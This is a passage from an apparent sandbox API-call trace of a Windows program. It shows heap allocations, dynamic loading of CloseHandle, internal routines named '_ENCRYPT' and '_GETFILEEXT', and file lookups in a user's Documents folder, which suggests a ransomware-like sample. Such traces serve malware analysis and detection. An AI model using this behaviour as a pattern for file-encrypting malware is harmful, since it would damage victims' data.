out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0179.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0179.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.317] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0179.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0179.318] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0179.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0179.319] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.319] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0179.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bda38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0179.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.320] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0179.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0179.320] CloseHandle (hObject=0x120) returned 1 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0179.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.321] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.321] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0179.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0179.321] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0179.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0179.321] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0179.321] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0179.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.322] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0179.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c77ab30, ftCreationTime.dwHighDateTime=0x1d5dfc3, ftLastAccessTime.dwLowDateTime=0x99fe6ad0, ftLastAccessTime.dwHighDateTime=0x1d5d97b, ftLastWriteTime.dwLowDateTime=0x99fe6ad0, ftLastWriteTime.dwHighDateTime=0x1d5d97b, nFileSizeHigh=0x0, nFileSizeLow=0xa8f4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="T8zO.ots", cAlternateFileName="")) returned 0x90add8 [0179.323] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.323] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c77ab30, ftCreationTime.dwHighDateTime=0x1d5dfc3, ftLastAccessTime.dwLowDateTime=0x99fe6ad0, ftLastAccessTime.dwHighDateTime=0x1d5d97b, ftLastWriteTime.dwLowDateTime=0x99fe6ad0, ftLastWriteTime.dwHighDateTime=0x1d5d97b, nFileSizeHigh=0x0, nFileSizeLow=0xa8f4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="T8zO.ots", cAlternateFileName="")) returned 0x90add8 [0179.324] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, 